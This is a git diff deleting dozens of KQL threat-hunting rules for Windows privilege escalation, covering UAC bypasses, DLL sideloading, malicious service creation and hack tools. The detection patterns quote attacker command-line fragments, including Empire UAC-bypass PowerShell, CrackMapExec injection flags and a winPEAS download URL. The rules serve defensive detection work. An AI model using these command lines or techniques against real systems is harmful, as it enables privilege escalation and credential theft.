-| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql b/Privilege Escalation/Bypass_UAC_via_CMSTP.kql
deleted file mode 100644
index 8ff3d7ea..00000000
--- a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql b/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql
deleted file mode 100644
index 99e8774a..00000000
--- a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql b/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql
deleted file mode 100644
index 3524a28c..00000000
--- a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019/10/24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/COM_Hijack_via_Sdclt.kql b/Privilege Escalation/COM_Hijack_via_Sdclt.kql
deleted file mode 100644
index 91b9bc53..00000000
--- a/Privilege Escalation/COM_Hijack_via_Sdclt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omkar Gudhate
-// Date: 2020/09/27
-// Level: high
-// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
-// Tags: attack.privilege_escalation, attack.t1546, attack.t1548
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql b/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
deleted file mode 100644
index 5f8aed77..00000000
--- a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72, oscd.community
-// Date: 2020/10/14
-// Level: high
-// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
-// Tags: attack.execution, attack.privilege_escalation, attack.t1055
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql b/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql b/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
deleted file mode 100644
index a4dbd554..00000000
--- a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco
-// Date: 2019/08/30
-// Level: critical
-// Description: Detects some Empire PowerShell UAC bypass methods
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql b/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql
deleted file mode 100644
index 38bdaaa1..00000000
--- a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/27
-// Level: high
-// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql b/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql
deleted file mode 100644
index 335281d7..00000000
--- a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/20
-// Level: critical
-// Description: Detects the use of SharpUp, a tool for local privilege escalation
-// Tags: attack.privilege_escalation, attack.t1615, attack.t1569.002, attack.t1574.005
-DeviceProcessEvents
-| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql b/Privilege Escalation/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql b/Privilege Escalation/HackTool_-_winPEAS_Execution.kql
deleted file mode 100644
index 320e767a..00000000
--- a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Georg Lauenstein (sure[secure])
-// Date: 2022/09/19
-// Level: high
-// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
-// Tags: attack.privilege_escalation, attack.t1082, attack.t1087, attack.t1046
-DeviceProcessEvents
-| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Interactive_AT_Job.kql b/Privilege Escalation/Interactive_AT_Job.kql
deleted file mode 100644
index 47f1d4f1..00000000
--- a/Privilege Escalation/Interactive_AT_Job.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
-// Tags: attack.privilege_escalation, attack.t1053.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Driver_Creation.kql b/Privilege Escalation/LiveKD_Driver_Creation.kql
deleted file mode 100644
index 7e5f529f..00000000
--- a/Privilege Escalation/LiveKD_Driver_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 69e1685e..00000000
--- a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql
deleted file mode 100644
index 003653f9..00000000
--- a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql b/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql
deleted file mode 100644
index 2be19bac..00000000
--- a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2021/07/12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql b/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Privilege Escalation/Modify_Group_Policy_Settings.kql b/Privilege Escalation/Modify_Group_Policy_Settings.kql
deleted file mode 100644
index 45d1feba..00000000
--- a/Privilege Escalation/Modify_Group_Policy_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql b/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql
deleted file mode 100644
index 7fba55a2..00000000
--- a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql b/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql
deleted file mode 100644
index 1dbdb0cb..00000000
--- a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/14 -// Level: medium -// Description: Detects creation of a new service (kernel driver) with the type "kernel" -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql b/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql deleted file mode 100644 index ce9fb3fa..00000000 --- a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023/02/20 -// Level: low -// Description: Detects the creation of a new service using powershell. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName" \ No newline at end of file diff --git a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql b/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql deleted file mode 100644 index dd56c1e4..00000000 --- a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023/02/20 -// Level: low -// Description: Detects the creation of a new service using the "sc.exe" utility. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file 
diff --git a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql deleted file mode 100644 index ef12160b..00000000 --- a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/06/19 -// Level: high -// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. -Adversaries may abuse time providers to execute DLLs when the system boots. -The Windows Time service (W32Time) enables time synchronization across and within domains. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003 -DeviceRegistryEvents -| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file diff --git a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql b/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file 
diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql deleted file mode 100644 index 4e6050fc..00000000 --- a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: medium -// Description: Detects the execution of AdvancedRun utility -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql deleted file mode 100644 index c00dd12f..00000000 --- a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: high -// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11")) \ No newline at end of file 
